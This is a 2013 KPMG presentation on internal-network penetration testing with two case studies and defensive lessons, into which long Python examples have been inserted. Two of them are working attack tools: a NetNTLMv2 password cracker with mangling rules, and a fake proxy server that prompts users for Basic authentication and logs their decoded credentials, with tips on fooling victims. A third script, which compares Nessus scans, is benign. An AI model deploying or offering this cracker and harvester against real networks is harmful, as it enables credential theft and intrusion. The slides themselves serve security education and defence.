Penetration Testing - a tool for improving our cyber security
Adrian Furtuna Ph.D. CEH, KPMG Management Consulting, IT Advisory
Cyber Security – A Mutual Challenge, Embassy of Sweden, 12th March 2013
Agenda
Who am I
Why this topic
Case study 1
Case study 2
Lessons learned
Conclusions
Q&A
©2013 KPMG Romania SRL, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated
Who am I
Member of the Pentest Team in KPMG Romania
Our motto: “ Hacking through complexity ”
Doing pentests against various applications and systems:
Internet Banking applications
General web applications
Mobile applications
Internal networks, public networks
Wireless networks
Social engineering, etc
Speaker at Hacktivity, DefCamp, Hacknet and other local security confs
Teaching assistant at Information Security Master programs (UPB, MTA and ASE)
Teaching penetration testing classes
Organizing Capture the Flag contests
Why this topic?
The need for more efficient cyber security
Penetration testing is part of the defense-in-depth approach
Verify the effectiveness of defense mechanisms and people
Find weak spots in defense layers
Show the real risk of a vulnerability
Suggest corrective measures
Re-verify
Is my data safe?
Penetration testing can be used for improving our cyber security
Case Study 1
Pentesting the internal network (2011)
Objective: See what an internal malicious user could do, given simple physical network access.
■ Malicious user:
visitor, contractor, malicious employee
■ Targets:
confidential data, client information, strategic business plans, etc.
■ Initial access:
a physical network port in the users' subnet
Pentesting the internal network (2011) – cont.
1. Network mapping
■ IP ranges
■ Host names
2. Service and OS discovery
■ Windows 7
■ Windows Server 2008 R2
■ Common client ports open
■ IIS, MsSQL, Exchange, etc.
3. Vulnerability scanning
■ Nessus: 1 high, 30 medium, 39 low
■ MsSQL server default password for the sa user
Pentesting the internal network (2011) – cont.
4. Exploitation
■ Add local admin
5. Post-exploitation
■ Info gathering
■ Credentials to other systems
6. Pivoting
■ Connect to the 2nd DB server
■ Upload Meterpreter
7. Post-exploitation
■ List tokens
■ Impersonate Domain Admin token
■ Create Domain Admin user
■ Game Over
Pentesting the internal network (2011) – cont.
Game over on the Domain Controller (screenshot):
Case Study 2
Pentesting the (same) internal network (2012)
Objective: See what an internal malicious user could do, given simple network access. Re-test the findings from the previous year.
■ Malicious user:
visitor, contractor, malicious employee
■ Targets:
confidential data, client information, strategic business plans, etc.
■ Initial access:
a network port in the users' subnet
Pentesting the (same) internal network (2012) – cont.
1. Network mapping
■ ~ the same as last year
2. Service and OS discovery
■ ~ the same as last year
3. Vulnerability scanning
■ Nessus: 0 high, 21 medium, 30 low
Now what?
■ No default/weak passwords
■ No missing patches
■ No exploitable config problems
■ No SQL injection…
Pentesting the (same) internal network (2012) – cont.
4. Attack the clients – method 1
■ Set up a fake local NetBIOS name server
■ Respond to every name request with my IP address
■ Set up multiple local services (HTTP, SMB)
■ Request Windows authentication on connection => capture password hashes
Pentesting the (same) internal network (2012) – cont.
4. Attack the clients – method 1 – cont.
■ Captured around 50 NTLM hashes (Net-NTLM challenge/response values: crackable offline, not usable for pass-the-hash)
■ Cracked about 25% in a few hours using a dictionary attack with mangling rules
■ Gained network access as a domain user (low privileges)
■ Could access some shared files on the file server
■ Not enough
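The cracking step above, as an added example (not the speaker's tooling): a Python dictionary attack with mangling rules against captured NetNTLMv2 challenge/responses in the hashcat "5600" line format (user::domain:challenge:NTProofStr:blob). For each candidate password it computes the NT hash (MD4 over UTF-16LE), derives the NTLMv2 key and the proof for the captured challenge and blob, and compares. MD4 is implemented inline because hashlib on OpenSSL 3 builds often lacks it. The three captures and the five-word list are constructed for the example (the challenge and blob are fixed values and the proofs are computed from known passwords); user names, the CORP domain and the rule set are assumptions.

```python
"""Dictionary + mangling-rule attack on captured NetNTLMv2 challenge/responses."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data):
    """RFC 1320 MD4 in pure Python: the NT hash is MD4, and OpenSSL 3 builds of
    hashlib often do not expose it. Slow, but exact."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password, user, domain, server_challenge, blob):
    """NTProofStr = HMAC-MD5(K, challenge || blob),
    K = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) || domain))."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def mangle(word):
    """A tiny rule set in the spirit of John/hashcat rules: case variants,
    simple leetspeak, common suffixes. Yields each candidate once."""
    bases = {word, word.lower(), word.capitalize(), word.upper()}
    bases |= {b.replace("a", "@").replace("o", "0").replace("s", "$") for b in list(bases)}
    seen = set()
    for base in sorted(bases):
        for suffix in ("", "1", "123", "!", "1!", "01", "2012", "2013"):
            cand = base + suffix
            if cand not in seen:
                seen.add(cand)
                yield cand


def parse_capture(line):
    """One hashcat 5600 line: user::domain:challenge:NTProofStr:blob (hex fields)."""
    user, _, rest = line.partition("::")
    domain, challenge, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(capture_lines, wordlist):
    """Return {user: password} for every capture some mangled word explains."""
    targets = [parse_capture(line) for line in capture_lines]
    found = {}
    for word in wordlist:
        for cand in mangle(word):
            for user, domain, challenge, proof, blob in targets:
                if user not in found and hmac.compare_digest(
                        ntlmv2_proof(cand, user, domain, challenge, blob), proof):
                    found[user] = cand
    return found


def make_sample_capture(user, domain, password):
    """Constructed capture (fixed challenge and blob, proof computed from the
    known password) so the example runs offline; not a real capture."""
    challenge = bytes.fromhex("1122334455667788")
    blob = bytes.fromhex("0101000000000000" + "00" * 24)
    proof = ntlmv2_proof(password, user, domain, challenge, blob)
    return "%s::%s:%s:%s:%s" % (user, domain, challenge.hex(), proof.hex(), blob.hex())


SAMPLE_CAPTURES = [
    make_sample_capture("jsmith", "CORP", "Summer2012"),
    make_sample_capture("adm_it", "CORP", "P@$$w0rd!"),
    make_sample_capture("ceo", "CORP", "x7#Ql!pz9Vb"),   # not derivable from the list
]
WORDLIST = ["summer", "winter", "password", "welcome", "corp"]

if __name__ == "__main__":
    print(crack(SAMPLE_CAPTURES, WORDLIST))  # {'jsmith': 'Summer2012', 'adm_it': 'P@$$w0rd!'}
```

Two of the three constructed captures fall to a five-word list with a handful of rules, which is the point of the slide's "about 25% in a few hours": the cost is one MD4 and two HMAC-MD5 per candidate per capture, so season+year and leetspeak passwords offer no real resistance. Note that NetNTLMv2 is salted by the server challenge and the client blob, so unlike raw NT hashes there is no rainbow-table shortcut and each capture has to be attacked separately.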
Pentesting the (same) internal network (2012) – cont.
4. Attack the clients – method 2
■ Man-in-the-middle attack between the victim and the proxy server
■ Set up a fake local proxy server
■ Request Basic authentication
■ Receive the user's credentials in clear text (only base64 encoded)
Pentesting the (same) internal network (2012) – cont.
4. Attack the clients – method 2 – cont.
The victim sees this (the browser's proxy authentication prompt):
What would you do?
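The exchange behind method 2, as an added example that is not part of the presentation: a Python fake proxy that answers every request with 407 Proxy Authentication Required and a Basic challenge, and decodes the Proxy-Authorization header the browser sends back once the user fills in the prompt. The man-in-the-middle step that redirects traffic from the real proxy to this one is assumed to have been done separately and is not in the code. The realm text, port 3128, the intranet URL and the CORP\jsmith credentials in the sample requests are constructed for the example.

```python
"""Fake HTTP proxy that demands Basic authentication and harvests the reply."""
import base64
import binascii
import socket

REALM = "Corporate Proxy"   # assumed realm text; pick one the victims expect


def build_407():
    """Server side of the exchange: the challenge every request gets."""
    body = b"<html><body>Proxy authentication required.</body></html>"
    headers = [
        b"HTTP/1.1 407 Proxy Authentication Required",
        b'Proxy-Authenticate: Basic realm="%s"' % REALM.encode(),
        b"Content-Type: text/html",
        b"Content-Length: %d" % len(body),
        b"Connection: close",
    ]
    return b"\r\n".join(headers) + b"\r\n\r\n" + body


def basic_token(user, password):
    """Client side: what a browser puts after 'Basic ' once the user has typed
    into the prompt. Encoding only, no secrecy."""
    return base64.b64encode(("%s:%s" % (user, password)).encode()).decode()


def extract_proxy_credentials(raw_request):
    """(user, password) from a Proxy-Authorization: Basic header, or None when
    the header is missing, uses another scheme (e.g. NTLM) or is not decodable."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:
        name, sep, value = line.partition(b":")
        if not sep or name.strip().lower() != b"proxy-authorization":
            continue
        scheme, _, token = value.strip().partition(b" ")
        if scheme.lower() != b"basic":
            return None
        try:
            decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return None
        user, _, password = decoded.partition(":")   # RFC 7617: the first ':' separates
        return user, password
    return None


def handle(raw_request):
    """One round trip: (response_bytes, credentials or None). This harvester
    always challenges and never forwards, so browsing through it fails; on a
    real engagement you would relay to the genuine proxy after capture."""
    return build_407(), extract_proxy_credentials(raw_request)


def serve(bind_ip="0.0.0.0", port=3128, log_path="proxy_creds.txt"):
    """Listen where the victims' proxy setting now points and log credentials."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_ip, port))
    srv.listen(16)
    while True:
        conn, peer = srv.accept()
        with conn:
            response, creds = handle(conn.recv(65536))
            if creds:
                with open(log_path, "a") as log:
                    log.write("%s %s:%s\n" % (peer[0], creds[0], creds[1]))
            conn.sendall(response)


# Constructed sample exchange (not a real capture): the first request carries no
# credentials, the second is what the browser sends after the user fills the prompt.
SAMPLE_FIRST_REQUEST = b"GET http://intranet/ HTTP/1.1\r\nHost: intranet\r\n\r\n"
SAMPLE_AUTH_REQUEST = (b"GET http://intranet/ HTTP/1.1\r\nHost: intranet\r\n"
                       b"Proxy-Authorization: Basic "
                       + basic_token("CORP\\jsmith", "Summer2012").encode() + b"\r\n\r\n")

if __name__ == "__main__":
    serve()
```

Nothing here breaks any cryptography: Basic is base64 of user:password by design, and the browser hands it over to whatever answers 407 on the configured proxy address. The only defence is the one the slide's "What would you do?" points at: users who recognise an unexpected proxy prompt, plus a proxy that authenticates with Kerberos or NTLM (which this harvester explicitly refuses) rather than Basic.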
Pentesting the (same) internal network (2012) – cont.
5. Exploitation
■ Got the local admin password (global, i.e. the same on every workstation) from a special user
■ Could connect as admin on any workstation
6. Pivoting
■ Searched the machines in the IT subnet for interesting credentials / tokens
■ Found a process running as a domain admin user
7. Exploitation
■ Impersonate the domain admin token
■ Create a new domain admin user
■ Game over
Lessons learned
Pentest comparison

Criterion                         2011     2012
Low hanging fruits removed        no       yes
IT personnel vigilance            low      high
Network prepared for pentest      no       yes
Existing vulnerabilities          yes      yes (lower number)
Overall exploitation difficulty   medium   high
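The year-over-year comparison above, as an added example (not from the presentation): a Python script that reads two Nessus .nessus v2 exports and reports severity counts plus which findings were fixed, which are new and which persist, keyed on host, port, protocol and plugin ID. It also serves case study 1's step 3, where the single high finding was the MsSQL sa default password. The two reports embedded in it are constructed miniatures of the 2011 and 2012 results; the 9000xx plugin IDs and the finding names are illustrative, not real Nessus plugins. Keep in mind what the table itself shows: the 2012 scan came back with zero highs and the domain still fell, so a scan delta measures hygiene, not exploitability.

```python
"""Diff two Nessus (.nessus v2 XML) exports: severity counts plus what was
fixed, what is new, and what persists."""
import xml.etree.ElementTree as ET

SEVERITY = {0: "info", 1: "low", 2: "medium", 3: "high", 4: "critical"}


def load_findings(nessus_xml):
    """{(host, port, protocol, pluginID): (severity, pluginName)}; the key is
    what makes a finding 'the same' finding in two scans."""
    findings = {}
    for host in ET.fromstring(nessus_xml).iter("ReportHost"):
        for item in host.iter("ReportItem"):
            key = (host.get("name"), item.get("port"), item.get("protocol"), item.get("pluginID"))
            findings[key] = (int(item.get("severity")), item.get("pluginName"))
    return findings


def severity_counts(findings):
    counts = {label: 0 for label in SEVERITY.values()}
    for sev, _ in findings.values():
        counts[SEVERITY.get(sev, "info")] += 1
    return counts


def diff_scans(old, new):
    """fixed = in old only, added = in new only, persistent = in both
    (severity and name taken from the new scan)."""
    fixed = {k: old[k] for k in old.keys() - new.keys()}
    added = {k: new[k] for k in new.keys() - old.keys()}
    persistent = {k: new[k] for k in old.keys() & new.keys()}
    return fixed, added, persistent


def report(old_xml, new_xml):
    """Plain-text summary, highest severity first inside each group."""
    old, new = load_findings(old_xml), load_findings(new_xml)
    fixed, added, persistent = diff_scans(old, new)
    lines = ["before: %s" % severity_counts(old), "after:  %s" % severity_counts(new)]
    for label, group in (("fixed", fixed), ("new", added), ("persistent", persistent)):
        for (host, port, proto, pid), (sev, name) in sorted(group.items(), key=lambda kv: -kv[1][0]):
            lines.append("%-10s %-8s %s:%s/%s  %s (plugin %s)"
                         % (label, SEVERITY[sev], host, port, proto, name, pid))
    return "\n".join(lines)


def _nessus_doc(items):
    """Wrap (host, port, protocol, pluginID, severity, name) tuples in the
    minimal .nessus v2 structure: constructed test data, not a real export."""
    hosts = "".join(
        '<ReportHost name="%s"><ReportItem port="%s" protocol="%s" pluginID="%s" '
        'severity="%d" pluginName="%s"/></ReportHost>' % t for t in items)
    return '<NessusClientData_v2><Report name="internal">%s</Report></NessusClientData_v2>' % hosts


# Miniature versions of the 2011 and 2012 scans. Plugin IDs 9000xx and the
# finding names are illustrative, not real Nessus plugin IDs.
SCAN_2011 = _nessus_doc([
    ("10.10.1.20", "1433", "tcp", "900001", 3, "MS SQL Server 'sa' account has default password"),
    ("10.10.1.21", "445", "tcp", "900002", 2, "SMB signing not required"),
    ("10.10.1.22", "443", "tcp", "900003", 2, "SSL certificate is self-signed"),
    ("10.10.1.22", "80", "tcp", "900004", 1, "HTTP TRACE method enabled"),
])
SCAN_2012 = _nessus_doc([
    ("10.10.1.21", "445", "tcp", "900002", 2, "SMB signing not required"),
    ("10.10.1.22", "443", "tcp", "900003", 2, "SSL certificate is self-signed"),
    ("10.10.1.23", "3389", "tcp", "900005", 1, "Terminal Services encryption level is medium"),
])

if __name__ == "__main__":
    print(report(SCAN_2011, SCAN_2012))
```

Keying on host+port+protocol+plugin rather than on plugin alone is what lets the diff distinguish "fixed on this host" from "still open on another one", which is the difference between the 2011 high disappearing and the same service being reachable from a different subnet. Severity 4 (critical) did not exist in the Nessus versions of 2011; the mapping keeps it so newer exports parse the same way.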
Consultant’s advice
■ Run periodic vulnerability assessments yourself (e.g. Nessus scans)
■ Prepare your network before a pentest (you should always be prepared, btw)
■ A homogeneous network is easier to defend than a heterogeneous one
■ Do not allow local admin rights for regular users
■ Patch, patch, patch
■ Educate users about security risks
Conclusions
Penetration testing can be used for improving our cyber security
Do it periodically with specialized people
Mandatory for new applications / systems before putting them into production
Vulnerability assessment is not penetration testing
Q&A
Thank You
Adrian Furtunǎ, PhD, CEH
Security Consultant, KPMG Romania
IT Advisory, Management Consulting
+40 747 333 008
[email protected]
© 2013 KPMG Romania, a Romanian limited liability company and a member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative (“KPMG International”), a Swiss entity. All rights reserved. The information contained herein is of a general nature and is not intended to address the circumstances of any particular individual or entity. Although we endeavor to provide accurate and timely information, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future. No one should act on such information without appropriate professional advice after a thorough examination of the particular situation.